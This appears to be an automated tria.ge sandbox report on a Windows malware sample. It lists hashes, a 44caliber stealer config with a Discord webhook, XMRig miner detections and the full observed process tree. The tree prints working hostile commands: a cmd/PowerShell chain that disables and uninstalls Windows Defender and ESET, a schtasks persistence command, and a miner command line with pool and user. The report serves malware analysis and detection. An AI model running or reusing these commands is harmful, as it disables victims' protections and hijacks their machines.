Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
0s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
31/12/2023, 08:14
Static task
static1
Behavioral task
behavioral1
Sample
2eb2782cc346b73b7180e3e9a220041c.exe
Resource
win7-20231215-en
General
-
Target
2eb2782cc346b73b7180e3e9a220041c.exe
-
Size
9.3MB
-
MD5
2eb2782cc346b73b7180e3e9a220041c
-
SHA1
b5d7dbb4f29e2567f9e4d67a9d64d7034ff5a968
-
SHA256
3220df74888873a8f81e0bde3f4743c25f908bf0c97b768863b67d8d78867425
-
SHA512
5124335f1362a836dd6f539052f705e64d080fc640abaf489c2407b819de9e79740ca0d5cc8a32310acecdd5e6a6076d83cb4cb7d013fc82b49b060c2b67dec9
-
SSDEEP
196608:DzB+082zIZNrOYyPugEl4ZXni32eZ3WU5QR6kj09F1lThXBhc+YX7:DzB+GeN/y2jl4N+2KWVR6u0P1l3Sj
Malware Config
Extracted
44caliber
https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5
Signatures
-
XMRig Miner payload 11 IoCs
resource yara_rule behavioral1/memory/2036-1510-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/2036-1513-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/2036-1512-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/2036-1515-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/2036-1516-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/2036-1518-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/2036-1519-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/2036-1526-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/2036-1528-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/2036-1517-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/2036-1509-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 2680 Interialoader.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 freegeoip.app 3 freegeoip.app -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1244 sc.exe 1600 sc.exe 1280 sc.exe 2716 sc.exe 2784 sc.exe 1244 sc.exe 1004 sc.exe 3048 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2572 schtasks.exe 2272 schtasks.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2264 wrote to memory of 2680 2264 2eb2782cc346b73b7180e3e9a220041c.exe 28 PID 2264 wrote to memory of 2680 2264 2eb2782cc346b73b7180e3e9a220041c.exe 28 PID 2264 wrote to memory of 2680 2264 2eb2782cc346b73b7180e3e9a220041c.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\2eb2782cc346b73b7180e3e9a220041c.exe"C:\Users\Admin\AppData\Local\Temp\2eb2782cc346b73b7180e3e9a220041c.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"2⤵
- Executes dropped EXE
PID:2680 -
C:\Users\Admin\AppData\Local\Temp\Insidious.exe"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"3⤵PID:2564
-
-
C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"3⤵PID:2644
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit4⤵PID:2904
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"4⤵PID:1536
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit5⤵PID:2500
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'6⤵PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'6⤵PID:1576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵PID:2088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true6⤵PID:1452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true6⤵PID:2492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true6⤵PID:824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true6⤵PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true6⤵PID:1616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true6⤵PID:2204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled6⤵PID:1956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force6⤵PID:408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled6⤵PID:1580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend6⤵PID:1468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend6⤵PID:1680
-
-
C:\Windows\system32\sc.exesc stop WinDefend6⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled6⤵
- Launches sc.exe
PID:1244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled6⤵PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender6⤵PID:1012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI6⤵PID:268
-
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet6⤵PID:2760
-
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall6⤵PID:2992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit5⤵PID:2644
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'6⤵
- Creates scheduled task(s)
PID:2272
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:1288
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit6⤵PID:1928
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵PID:1668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true7⤵PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true7⤵PID:1452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true7⤵PID:2536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true7⤵PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true7⤵PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true7⤵PID:376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled7⤵PID:1488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force7⤵PID:2972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled7⤵PID:2540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend7⤵PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend7⤵PID:852
-
-
C:\Windows\system32\sc.exesc stop WinDefend7⤵
- Launches sc.exe
PID:1244
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled7⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled7⤵PID:2640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender7⤵PID:352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI7⤵PID:2680
-
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet7⤵PID:1872
-
C:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\dismhost.exeC:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\dismhost.exe {B4A3C51C-44D4-46DA-A8B1-B841BC9F5D87}8⤵PID:1736
-
-
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall7⤵PID:3000
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6056254 --pass=in --cpu-max-threads-hint=40 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth5⤵PID:2036
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵PID:2944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"2⤵PID:2704
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://java.com/download3⤵PID:2100
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'1⤵PID:2568
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit1⤵PID:2536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'2⤵PID:2424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵PID:300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'2⤵PID:268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true2⤵PID:3016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true2⤵PID:2244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true2⤵PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true2⤵PID:1480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true2⤵PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled2⤵PID:1600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force2⤵PID:796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled2⤵PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend2⤵PID:1020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend2⤵PID:1576
-
-
C:\Windows\system32\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:1280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled2⤵PID:376
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled2⤵
- Launches sc.exe
PID:2716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender2⤵PID:1972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI2⤵PID:852
-
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet2⤵PID:1464
-
C:\Users\Admin\AppData\Local\Temp\229300D1-345A-4297-A9B8-0D34713749D9\dismhost.exeC:\Users\Admin\AppData\Local\Temp\229300D1-345A-4297-A9B8-0D34713749D9\dismhost.exe {DE4B2D20-4E23-408D-A3B8-20594FC0A24D}3⤵PID:2388
-
-
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall2⤵PID:300
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2100 CREDAT:275457 /prefetch:21⤵PID:2900
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'1⤵
- Creates scheduled task(s)
PID:2572
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'1⤵PID:2588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'1⤵PID:2964
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit1⤵PID:1980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'2⤵PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵PID:320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'2⤵PID:3060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableArchiveScanning $true2⤵PID:576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableBehaviorMonitoring $true2⤵PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableScriptScanning $true2⤵PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true2⤵PID:2580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -DisableIOAVProtection $true2⤵PID:1460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled2⤵PID:1504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force2⤵PID:1888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -MAPSReporting Disabled2⤵PID:332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend2⤵PID:2792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-Service WinDefend -StartupType Disabled2⤵PID:776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Stop-Service WinDefend2⤵PID:820
-
-
C:\Windows\system32\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:1004
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled2⤵
- Launches sc.exe
PID:3048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Uninstall-WindowsFeature -Name Windows-Defender2⤵PID:2200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI2⤵PID:2572
-
-
C:\Windows\system32\Dism.exeDism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet2⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\60B3B52D-B302-4850-83FB-AB30AED532B4\dismhost.exeC:\Users\Admin\AppData\Local\Temp\60B3B52D-B302-4850-83FB-AB30AED532B4\dismhost.exe {D7060BEB-5936-4DF1-B9E5-1A6BB1818D37}3⤵PID:400
-
-
-
C:\Windows\System32\Wbem\WMIC.exeWmic Product where name="Eset Security" call uninstall2⤵PID:2564
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1624
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'1⤵PID:2716
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59493a8f48a72a01dc0784eb7e14ea98a
SHA13b1f3ee2a36c789dfc77faba06fb8d26257e0181
SHA2560ee6cd54b411fa59321e5b4f8af36b5a4cc9e8dc09b57082fa5dc96f99e63f91
SHA512c2d510e794e4be9225a6bc7230d8eb4029cff5c414d4a003c9940b94f30c5dc8a36359b15620e3f43f113ce5aa983c6290dbec753d90e908eab1134aa610ccce
-
Filesize
2KB
MD510d603187dc14fda7711b4f46f146930
SHA198259f732f69d931f8acc4103b231947418c1527
SHA2561eebfc8bcfde8d41d484e49ba3ed2d247cfdc339cd8d04dce304cba2f3d4e427
SHA5121795a6aa9fccc0dd99e104d4f5275052b679571eae8181eee15175dd37b253f36665656c99565042081c5fdd2136fafb100f67ce5ff5a7c508006d8e4051af25
-
C:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\it-IT\TransmogProvider.dll.mui
Filesize13KB
MD5427b7bd1d65a111c2c7abc064ed742fc
SHA16d869a81e21102c73c36248b500ab5001f96d57a
SHA256f8cc90aa8265c48dbd345fc6362a90a64c39fd4655efe52f0f1909fe2973c423
SHA5128c6980b65d2a9f3c8da5bfccc4e2047845609b97d9ad35f69fa93f4cab4f3a5faf816eb8fab4d855819fe33c7c24d40dbc10aeae1564b4b748bf2624654ad812
-
C:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\it-IT\UnattendProvider.dll.mui
Filesize5KB
MD54764d3d02b3b379652793b4e7199b1f4
SHA139cd731d460d9f7ae6d9b4844111886038f20cdb
SHA256b7ea5c14fba9db1dbaf28770262641ab588bb18c5349279d725e924b48fe9f86
SHA512cde2303faf19a9229082fe542125b60f83910dbe0fb675eb9cea5d4da1f2a41ed96444be974dd12e4fbda51437731d82e887dc01a12327ed4d1d666b525b58cb
-
Filesize
14KB
MD5c87ec456b727c78a0701d1e9ec9725c4
SHA1adcf77ddd1055c95ca74107244d9ecb9d31f60ef
SHA256bc5fee7a3acd827d5879a6980446e9a9e17e803181b87b9821689415ff82b1c3
SHA5127d4040332fa637d8f7a4a44933ea66503cc444374e6e65321ec1f832ca56963121f73675ece9ceb0f457d7ecd1683460f853304ec3947096141c09b36c2df9e1
-
Filesize
23KB
MD5d2fa1cacec5c85b0d331a3871802c1f1
SHA174e4ae152142f9d2b593c7929173216b9d308bc5
SHA25659f0f929905a47ea267f6d2f7b29c3d052dc4d311cf39d67926ecf49f55cce1c
SHA512cdcaddab1a2035ed16850bfe7595e684e9ea25058e4e0075b5d9a9c8eee9e987cf576cfd9f05d5046f1f88cde49939878d7a99463e194f67f430cfe64679532b
-
Filesize
9KB
MD5e32051966f93873e14949bbe783ba00f
SHA123967095ce1b56d3988697f8a0af5007706df816
SHA2564c1c4fb00ed369ba5b9ff7af6a1dca42f6d02544e24978c29e078e779ca3e25c
SHA5129f7362614ee0914d2f4716572b09c40e33a54949cb1e5d6cf54e1e63d1a5fa31d39202d8c40cc46aceca691012a86cb22ad187be5497d2bc1e6d7c55223b1448
-
Filesize
4KB
MD544b4b5924ff125d77cf18afd41bc4b6d
SHA1fe13e911b24a281c29e872e5e90bcc4864536d0e
SHA2562e049b2af444d725482525a234eb5e95fd03faa81b45b4e06436fb1e8b65efa3
SHA512b2042df52fd499a2130482e853bb414ec4b1bfe7da04de5aee1d6747b14d4bf8fd682ab7c5648e13da1810adee8d5a6802552db5e0973a9f42f80b9456810f02
-
Filesize
2KB
MD54519ab964952d540867aa739ed633678
SHA1048145bcf9cbf299498c30ff7cd869d77abf7253
SHA2565e426c22ca4366a0872e8a1dab4084fde657cc97f06e9af2112bf54ef2ff5d5c
SHA512d857305e379b7d3489cb423b9ca7c572ea62013e85c7b1f88265e4d116c1ed3e8cda5fa817d30fa40aa7a1b718e4a53d3ac9768174ae573726d6dc0a5585ae78
-
Filesize
11KB
MD58e2bed729784eb0e3ac47b6227e8e15e
SHA1812200501ecf49535fe131d429b02c6429418d37
SHA256f684b2973758e27b0037da6546520e72f07e3222c6606d50e2afb2ec11fb6861
SHA5127a7ac1b034390809fdb05bb8d3f32f1af06b2b58c7688e127daf921633a6fcfb8e4fd0dba2e33e3b776179609b4155710077a2dc7d35af149fbb024b4bda12c3
-
Filesize
2KB
MD587267a6260941229500cf48baf4f59fb
SHA10fbaa2bd71cd88ae058ddde5ee27759bf2187e04
